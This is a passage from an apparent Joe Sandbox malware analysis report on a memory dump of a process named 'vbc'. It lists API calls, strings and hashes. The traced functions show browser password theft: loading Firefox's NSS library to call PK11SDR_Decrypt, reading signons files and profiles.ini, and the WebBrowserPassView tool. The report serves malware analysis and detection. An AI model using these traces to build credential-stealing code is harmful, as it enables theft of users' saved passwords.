                                                              • Instruction ID: 8ff438caca04d900f401a49fee0f0db12add2221ca5be9c1dac879361ae65e4d
                                                              • Opcode Fuzzy Hash: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
                                                              • Instruction Fuzzy Hash: E3B1B071108341AFD720DF68C985E6BBBF9FB88704F004A2DF69692261DB75E944CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                              • String ID: WebBrowserPassView
                                                              • API String ID: 829165378-2171583229
                                                              • Opcode ID: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
                                                              • Instruction ID: 8d9c6eba8ddb3a7c26c98eaf12cf57faa7ce2db5dd3d1d54ce32cd9ff2fd20fc
                                                              • Opcode Fuzzy Hash: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
                                                              • Instruction Fuzzy Hash: 8C517E35500308BBDB22AF64DC45E6E7BB5FB04742F104A7AF952A66F0C774AE50EB18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              • {Unknown}, xrefs: 0040F831
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040FA0E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                              • API String ID: 4111938811-1819279800
                                                              • Opcode ID: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
                                                              • Instruction ID: 69e9f0bde0ef3093fe47e3bafb281a214b560c7f74f151c34d98b156b899ddfd
                                                              • Opcode Fuzzy Hash: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
                                                              • Instruction Fuzzy Hash: F7719FB680121DBEEF219B50DC45EDA7B6CEF08355F0000B6F508A21A1DA799E88CF69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040FB20
                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
                                                              • memset.MSVCRT ref: 0040FB90
                                                              • wcslen.MSVCRT ref: 0040FB9D
                                                              • wcslen.MSVCRT ref: 0040FBAC
                                                              • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
                                                              • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
                                                              • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
                                                              • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
                                                              • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
                                                              • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
                                                              • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040FC6B
                                                              • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040FC77
                                                                • Part of subcall function 0040648C: memset.MSVCRT ref: 004064AD
                                                                • Part of subcall function 0040648C: memset.MSVCRT ref: 004064FA
                                                                • Part of subcall function 0040648C: RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
                                                                • Part of subcall function 0040648C: wcscpy.MSVCRT ref: 00406642
                                                                • Part of subcall function 0040648C: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
                                                                • Part of subcall function 0040648C: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
                                                              • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                              • API String ID: 2554026968-4029219660
                                                              • Opcode ID: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
                                                              • Instruction ID: eeb2f36212a21d3aa086fe7dd3a0485c0e35c5a93e030d286215ed8b11f998db
                                                              • Opcode Fuzzy Hash: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
                                                              • Instruction Fuzzy Hash: 15418371940309ABEB209F61CC85E9AB7F8BF58744F10087EE58593191EBB999848F58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
                                                              • String ID: General$IsRelative$Path$Profile%d$profiles.ini
                                                              • API String ID: 3014334669-2600475665
                                                              • Opcode ID: c5dfa419d5e156fd18e38bb9fe1657a50580db14dfc2297f0345cb0c168ef583
                                                              • Instruction ID: ca42eae1a8a54deb15ae60d9a008fbbac9316f2c57223d03809256618168ca92
                                                              • Opcode Fuzzy Hash: c5dfa419d5e156fd18e38bb9fe1657a50580db14dfc2297f0345cb0c168ef583
                                                              • Instruction Fuzzy Hash: F151627290021CBADB20EB55CD45ECEB7BCAF14744F5044B7B10DA2091EB789B888F6A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00403926: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
                                                                • Part of subcall function 00403926: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
                                                                • Part of subcall function 00403926: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
                                                                • Part of subcall function 00403926: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996
                                                              • SetErrorMode.KERNEL32(00008001,00000000,?,00000002), ref: 0040E319
                                                              • GetModuleHandleW.KERNEL32(00000000,00411F7E,00000000,?,00000002), ref: 0040E332
                                                              • EnumResourceTypesW.KERNEL32 ref: 0040E339
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E4CB
                                                              • DeleteObject.GDI32(?), ref: 0040E4E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                                              • String ID: $/deleteregkey$/savelangfile
                                                              • API String ID: 3591293073-28296030
                                                              • Opcode ID: cc2a4672e1e4faf1c95e138daee5a8e23fba00d41360e263cf3b3f73b30ac56e
                                                              • Instruction ID: 121834c48f7c844bba9a1922674ad86b62a86fe916e360ab8a1a69ef7a5829fa
                                                              • Opcode Fuzzy Hash: cc2a4672e1e4faf1c95e138daee5a8e23fba00d41360e263cf3b3f73b30ac56e
                                                              • Instruction Fuzzy Hash: 5451B171408345ABD720AFA2DD4895FB7A8FF84709F000D3EF640A3191DB79D9158B2A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0040A2C8: LoadMenuW.USER32 ref: 0040A2D0
                                                              • SetMenu.USER32(?,00000000), ref: 0040D2E0
                                                              • CreateStatusWindowW.COMCTL32(50000000,Function_000434FC,?,00000101), ref: 0040D2FB
                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040D313
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D322
                                                              • LoadImageW.USER32 ref: 0040D32F
                                                              • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040D359
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D366
                                                              • CreateWindowExW.USER32 ref: 0040D38D
                                                              • GetFileAttributesW.KERNEL32(004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D468
                                                              • GetTempPathW.KERNEL32(00000104,004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D478
                                                              • wcslen.MSVCRT ref: 0040D47F
                                                              • wcslen.MSVCRT ref: 0040D48D
                                                              • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001,?,00000000,/nosaveload,00000000,00000001), ref: 0040D4DA
                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040D515
                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040D528
                                                                • Part of subcall function 00403A14: wcslen.MSVCRT ref: 00403A31
                                                                • Part of subcall function 00403A14: SendMessageW.USER32(?,00001061,?,?), ref: 00403A55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$Send$CreateWindowwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterStatusTempToolbar
                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                                              • API String ID: 1638525581-2103577948
                                                              • Opcode ID: 09239095896d852bc9637f75337da0b8f677ca08e5855ea8ee30249aa1057c49
                                                              • Instruction ID: 7a0d9eec849a31f4480aab016bccc9be6ec6f6c883519ecda8bf5f9757aa8271
                                                              • Opcode Fuzzy Hash: 09239095896d852bc9637f75337da0b8f677ca08e5855ea8ee30249aa1057c49
                                                              • Instruction Fuzzy Hash: D7A1A171500388AFEB11DF68CC89BCA7FA5AF55704F04447DFA486B292C7B59908CB69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB20
                                                                • Part of subcall function 0040FAFF: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
                                                                • Part of subcall function 0040FAFF: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
                                                                • Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB90
                                                                • Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FB9D
                                                                • Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FBAC
                                                                • Part of subcall function 0040FAFF: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
                                                                • Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
                                                                • Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
                                                                • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
                                                                • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
                                                                • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
                                                                • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
                                                                • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
                                                              • memset.MSVCRT ref: 00406E17
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
                                                              • memset.MSVCRT ref: 00406E69
                                                              • memset.MSVCRT ref: 00406E81
                                                              • memset.MSVCRT ref: 00406E99
                                                              • memset.MSVCRT ref: 00406EB1
                                                              • wcslen.MSVCRT ref: 00406EBC
                                                              • wcslen.MSVCRT ref: 00406ECA
                                                              • wcslen.MSVCRT ref: 00406EF9
                                                              • wcslen.MSVCRT ref: 00406F07
                                                              • wcslen.MSVCRT ref: 00406F36
                                                              • wcslen.MSVCRT ref: 00406F44
                                                              • wcslen.MSVCRT ref: 00406F73
                                                              • wcslen.MSVCRT ref: 00406F81
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00407074
                                                                • Part of subcall function 0040697E: memset.MSVCRT ref: 004069BD
                                                                • Part of subcall function 0040697E: memset.MSVCRT ref: 00406A3C
                                                                • Part of subcall function 0040697E: memset.MSVCRT ref: 00406A51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memsetwcslen$AddressProc$CurrentDirectory$LibraryLoad$ByteCharHandleModuleMultiWide
                                                              • String ID: signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                              • API String ID: 1908949080-2435954524
                                                              • Opcode ID: 00d903caa4eb60a1b1d619f3f2ea5d5f954a86edb9cfa0049ad989ed505ac937
                                                              • Instruction ID: 8f96e2222c77d76af5181fd0f533d019f0899d465181413e0b466bd376840954
                                                              • Opcode Fuzzy Hash: 00d903caa4eb60a1b1d619f3f2ea5d5f954a86edb9cfa0049ad989ed505ac937
                                                              • Instruction Fuzzy Hash: 8871B07180461AABDB21EF61DC41A9E77BCFF04318F1004AEF909F2181E779AE548F69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00441C46
                                                              • GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
                                                              • VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
                                                              • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
                                                              • _snwprintf.MSVCRT ref: 00441CC6
                                                              • wcscpy.MSVCRT ref: 00441CF0
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00441DA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                              • API String ID: 1223191525-1542517562
                                                              • Opcode ID: f0dcb2e3215272a51361a7c16fd4cc2b6b182257c639e453f8df9f3984dd40ea
                                                              • Instruction ID: 5dc843b0b2888ef0cde47c2e58fd974eed7f8edc5a370bbe46a7031584b3d011
                                                              • Opcode Fuzzy Hash: f0dcb2e3215272a51361a7c16fd4cc2b6b182257c639e453f8df9f3984dd40ea
                                                              • Instruction Fuzzy Hash: 044143B2940618BAE704EFA1EC82DDEB7BCFF08744B400557B505A3151DB78BA85CBE8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C912
                                                              • memset.MSVCRT ref: 0040C927
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C970
                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C97B
                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
                                                              • LoadImageW.USER32 ref: 0040C9F8
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
                                                              • LoadImageW.USER32 ref: 0040CA15
                                                              • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
                                                              • GetSysColor.USER32(0000000F), ref: 0040CA2E
                                                              • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040CA49
                                                              • ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040CA59
                                                              • DeleteObject.GDI32(?), ref: 0040CA65
                                                              • DeleteObject.GDI32(?), ref: 0040CA6B
                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040CA88
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 304928396-0
                                                              • Opcode ID: 45911c1970665382fa90db5d41abc719a2ef46b241cbde3be6a9b9b2f588298f
                                                              • Instruction ID: 0a3ff62ab3886bf523a191411b010267208ec01492d8cd9208f2635b8a46902f
                                                              • Opcode Fuzzy Hash: 45911c1970665382fa90db5d41abc719a2ef46b241cbde3be6a9b9b2f588298f
                                                              • Instruction Fuzzy Hash: A541B871640304BFE7209F70CC8AF97B7ACFB09B45F000929F399A51D1C6B5A9408B29
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040885E
                                                                • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
                                                                • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                                • Part of subcall function 0040FC89: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
                                                                • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
                                                                • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
                                                                • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
                                                                • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
                                                                • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
                                                                • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
                                                                • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
                                                                • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31
                                                              • CloseHandle.KERNEL32(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
                                                              • _wcsicmp.MSVCRT ref: 0040898B
                                                              • _wcsicmp.MSVCRT ref: 0040899E
                                                              • _wcsicmp.MSVCRT ref: 004089B1
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,000000FF,00000000,00000104), ref: 004089C5
                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00408A0B
                                                              • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00408A1A
                                                              • memset.MSVCRT ref: 00408A38
                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00408A6B
                                                              • _wcsicmp.MSVCRT ref: 00408A8B
                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 00408ACB
                                                              • FreeLibrary.KERNEL32(?,?,?,000000FF,00000000,00000104), ref: 00408AED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateFreeLibraryNameOpen
                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                              • API String ID: 814719012-3398334509
                                                              • Opcode ID: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
                                                              • Instruction ID: ac6d74245de41f4a68afaf46936feeb9e4215e23a81ac82868d75cf9687b4f7b
                                                              • Opcode Fuzzy Hash: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
                                                              • Instruction Fuzzy Hash: FB9115B1D00209AFDB10EF95C985AAEBBB5FF04305F60447FE949B6291DB399E40CB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 004064AD
                                                                • Part of subcall function 00411B67: RegOpenKeyExW.ADVAPI32(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                              • _wcsnicmp.MSVCRT ref: 00406520
                                                              • memset.MSVCRT ref: 00406544
                                                              • memset.MSVCRT ref: 00406560
                                                              • _snwprintf.MSVCRT ref: 00406580
                                                              • wcsrchr.MSVCRT ref: 004065A7
                                                              • CompareFileTime.KERNEL32(?,?,00000000), ref: 004065DA
                                                              • wcscpy.MSVCRT ref: 004065FC
                                                              • memset.MSVCRT ref: 004064FA
                                                                • Part of subcall function 00411BFE: RegEnumKeyExW.ADVAPI32(00000000,0040FB38,0040FB38,?,00000000,00000000,00000000,0040FB38,0040FB38,00000000), ref: 00411C21
                                                              • RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
                                                              • wcscpy.MSVCRT ref: 00406642
                                                              • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
                                                              • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                              • API String ID: 1094916163-2797892316
                                                              • Opcode ID: 6fc1e2e3a791b033bf776d6d93ccb5a8b208ad6747335505a9b79a97a3079406
                                                              • Instruction ID: 63e98d9b0590a06fe0611c8d8f76d67a06a86b9579f74a21c863053dc4382b5e
                                                              • Opcode Fuzzy Hash: 6fc1e2e3a791b033bf776d6d93ccb5a8b208ad6747335505a9b79a97a3079406
                                                              • Instruction Fuzzy Hash: F5515472D00218BAEF20EB61DC45ADFB7BCAF04354F0104A6F905F2191EB799B94CB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 3143752011-1996832678
                                                              • Opcode ID: 2ff61e6e61c45a42ec8a536e31393f15904b361fc50918dfd7b37e2d26dac3f0
                                                              • Instruction ID: 1bdd15307226dc02cd036ffdab734ce65306a7f25c134a46d7f370f8b7d92746
                                                              • Opcode Fuzzy Hash: 2ff61e6e61c45a42ec8a536e31393f15904b361fc50918dfd7b37e2d26dac3f0
                                                              • Instruction Fuzzy Hash: 2C31E9B2900305BEEB20AA559E82DBF73BCDF41715F60405FF214E21C2DABC9E859A1C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
